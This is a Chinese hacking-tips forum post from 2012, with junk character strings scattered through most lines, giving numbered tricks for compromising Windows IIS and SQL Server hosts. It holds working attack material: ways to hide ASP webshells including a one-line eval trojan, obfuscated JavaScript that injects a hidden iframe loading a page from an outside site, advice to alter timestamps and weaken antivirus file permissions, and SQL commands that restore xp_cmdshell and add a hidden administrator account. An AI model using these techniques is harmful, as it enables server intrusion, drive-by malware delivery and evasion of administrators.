53、隐藏ASP后门的两种方法8 D" t3 ]. C1 O
1、建立非标准目录:mkdir images..\1 b% s) D! Q3 M- ~ ], `: l# d2 [
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp; z9 d: [1 x8 S1 G
通过web访问ASP木马:http://ip/images../news.asp?action=login
' E# ^# l e; D/ e0 B9 w9 |3 W0 ?0 H8 Z如何删除非标准目录:rmdir images..\ /s
. e/ S4 K" ~" q6 H9 D2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:3 J/ D6 Q" u) c: T8 }
mkdir programme.asp! L- B7 J! ?7 l
新建1.txt文件内容:<!--#include file=”12.jpg”-->
# R/ R5 A' j- n, b. D4 Q: x新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件; @" P% M" d8 j: \
attrib +H +S programme.asp% R# f& c1 f* o; o: Y! ?
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
u- ?' r6 i2 H+ J5 E/ s# J' E7 K/ U7 d" c9 P3 N* ]
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
+ \( A+ U: Q. x0 ~, N- p! N$ g7 F然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' N% Z0 S0 V8 A8 y0 a4 [ y5 x5 V
7 T( N6 ]; Q4 b/ `55、JS隐蔽挂马' T; T5 r0 p1 ]" P
1.4 c- _% \4 \- u$ T
var tr4c3="<iframe src=ht";
, k& r; f0 r/ T4 l$ Ktr4c3 = tr4c3+"tp:/";. \' E+ D, V# k9 x5 c Y
tr4c3 = tr4c3+"/ww";. z" _: q. _1 D. w/ D
tr4c3 = tr4c3+"w.tr4";
' q( R4 p$ x8 h' Z/ u* Str4c3 = tr4c3+"c3.com/inc/m";6 F1 R* K$ ^: \, |/ H9 i- j* ^
tr4c3 = tr4c3+"m.htm style="display:none"></i";3 S$ i2 m9 j( H1 ?+ d# R
tr4c3 =tr4c3+"frame>'";% G! }& i" F7 e! V" i a( a
document.write(tr4c3);0 [8 k: j( k' F- e* Q2 R! k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
/ k9 x- F# Y( T; T, s$ r0 n- n4 M& X" d1 A% |5 {9 B
2.7 U$ [1 a, x6 O5 ~; D
转换进制,然后用EVAL执行。如
6 m! y2 }- T. m( Reval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
+ m ~; _; ]" @& J不过这个有点显眼。
; E+ `$ Z' @9 L+ O; K3.3 k, |+ ~$ }2 u+ O+ \% t) f
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 D2 P7 R7 j" d7 H3 H) g. _7 T& g) v最后一点,别忘了把文件的时间也修改下。
& {/ I- s- X9 p% z! g2 L, T# z
, I/ g+ e3 D8 M! j9 x% s56.3389终端入侵常用DOS命令
2 H0 I6 D; ]9 h, B: w# `1 ]taskkill taskkill /PID 1248 /t+ s! U; M) n$ n
7 T0 i P; Q ]" q. ~6 Qtasklist 查进程
, q& K4 ^6 A9 q2 B) \1 t# W2 ?, t0 L o2 n. h
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限6 R- S. z! d" Y3 }5 C/ ^+ }0 L
iisreset /reboot" x; \4 H1 q; z
tsshutdn /reboot /delay:1 重起服务器, P% u" @+ g1 _
% o7 s1 |' _$ x! N
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' y9 O: Q% D a9 @+ U( l3 C
: J/ V! R; J: V1 ^! ?" wquery user 查看当前终端用户在线情况
d: |3 K7 T( e _+ Y, x) @& E1 o2 D8 p' N0 ^; z
要显示有关所有会话使用的进程的信息,请键入:query process * [; T# X- j+ t: t
- M3 j* D% q2 n3 v% q" d: ]6 V- Y* R
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2! F: Q. l: B6 D# V3 \3 P7 j
. n* T4 h) s+ \8 Y" k" q6 L
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
! M/ B2 ]# g1 ~- ` `
* G0 D5 M$ f- J4 ~6 O# i% p1 c要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
/ u5 Z4 `& S- z5 n7 x, B0 n) Z) S6 Y' }* `' ?9 p
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启; S6 ^0 J7 A. p6 r* f |$ M
' V D! s1 k3 r% A* J. }1 X
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统: M. K$ d% k* \9 a, P0 w% x& n; ~
: Z* K, H- S! g! v命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。% I6 `- t8 ?' R U% F
3 K+ p8 G& M$ m# j) [$ N( e& z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 A: z8 g1 _" f
* f6 Y& U. \) y- i0 w2 |
56、在地址栏或按Ctrl+O,输入:
, \0 {, N. T0 x+ {javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
' E- n2 h d0 R K2 X
9 x y6 L# j2 x2 Z/ a5 ] t+ i9 {源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. s5 U) T5 [9 W; c2 t7 S* @" O/ S k
* O$ F8 i3 Y& |- _7 b; @57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 @# b0 F7 G. A- z8 F/ m用net localgroup administrators是可以看到管理组下,加了$的用户的。! f' Y C3 x! X+ A
B: v! z/ W0 D3 E9 a! V, z
58、 sa弱口令相关命令
/ [* h* S2 c" M' {* S/ k8 x( r0 ]( j0 U/ K( V7 F
一.更改sa口令方法:; k( b. x" r3 @# y
用sql综合利用工具连接后,执行命令:# E+ ?' @, u, b( C' I
exec sp_password NULL,'20001001','sa'+ C9 g1 `/ M0 h( m$ ], L
(提示:慎用!)5 H0 u3 z8 Z0 z4 w- B8 t
; V- e: N' Q5 b! C7 F& g0 `二.简单修补sa弱口令.
7 n, x: d. z* u" Q9 r" A Y( H/ @5 ?2 p( S
方法1:查询分离器连接后执行:$ [2 X& {1 s2 D: E3 v
if exists (select * from u6 ?8 J' {8 G& \6 T
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and4 l$ Z& X: D* t9 J- Z: x
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)% W& z- _7 ]4 ]5 d) L7 |9 y' X
0 B! D9 D+ \" y
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; `" H) {5 N! B' L8 m- e- L
1 Q: @3 ^! d1 [1 VGO8 P4 R/ c; C/ @. Y3 m; P
- p; [6 k: E+ n& o- A) j1 p8 [4 _然后按F5键命令执行完毕
* d! l1 Z- r% B; C& ? u9 j7 }- w# @4 E: v3 Y( E; [! u
方法2:查询分离器连接后" T; v. B4 C2 q- y1 S/ X! _. ?& C7 e( Y) [
第一步执行:use master
% T3 c N5 q- p6 D第二步执行:sp_dropextendedproc 'xp_cmdshell'- e6 u) [4 i% z$ n- J& n2 q
然后按F5键命令执行完毕
3 {+ e- v9 L5 A
6 h& j. G9 Y; D+ e
9 A0 s) F G! N) D: p6 G3 U& P) g三.常见情况恢复执行xp_cmdshell.
" W( Y: ]. P( |, n
2 }' t4 y; R* c! b; h& j) k2 P
' Q! B" t7 p- r5 K; c1 未能找到存储过程'master..xpcmdshell'.
" f7 ^2 y5 I( X* @* K 恢复方法:查询分离器连接后,
9 t5 k( n6 Z; X4 G第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* S4 _- |+ {9 S6 ?第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 K& Z0 u L+ L$ _' F$ O# |
然后按F5键命令执行完毕
0 K* f5 J/ {8 H: S7 c* d* M3 U/ w( n" R4 q
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) s& q+ X% {# j
恢复方法:查询分离器连接后,2 E# |1 W8 o2 N$ m$ P4 C( S
第一步执行:sp_dropextendedproc "xp_cmdshell": ^6 |! i- F) ^2 l& w- s6 d
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': o! F+ Q+ V5 {) v
然后按F5键命令执行完毕
' Z2 I7 A9 ~* E4 L# c- T
1 J& }7 j+ D; F3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
# o; ~; I3 w I& p6 O+ ^恢复方法:查询分离器连接后,
* i/ u6 p! ^1 k, I5 K/ K第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
# J: S _3 j( x% W, ^3 _' d8 ]第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 8 F) S* w, U% {, j2 X: L0 H: H
然后按F5键命令执行完毕
; F2 {3 R' e8 Z( V! h9 P' t* J5 k% i8 @- @, H5 z7 C- {
四.终极方法.; v" k, c( c2 z
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
# \( k4 w+ |) ^( w" f查询分离器连接后,! k$ ?: x) x* O8 f
2000servser系统:
7 I& d, L0 e7 N3 `5 ?, b, x, Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
8 J8 o1 {' P0 z0 f5 t8 e9 ^' I4 c. ]9 x$ {* T: x3 ?$ O0 e6 i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ h0 g y- e, C) s( w
" E' R/ U: M5 P- b2 A1 H7 U! s( M: K- axp或2003server系统:: C" B l) j' c; l4 E, W, P; U% [
% U* s$ d D4 F$ S8 j# [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
. _$ _; P" t9 j' H+ h! X4 P% z& R$ \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 ^: A4 K9 J+ U0 G% L
|
发表于 2012-9-15 14:51:03
收藏
支持
反对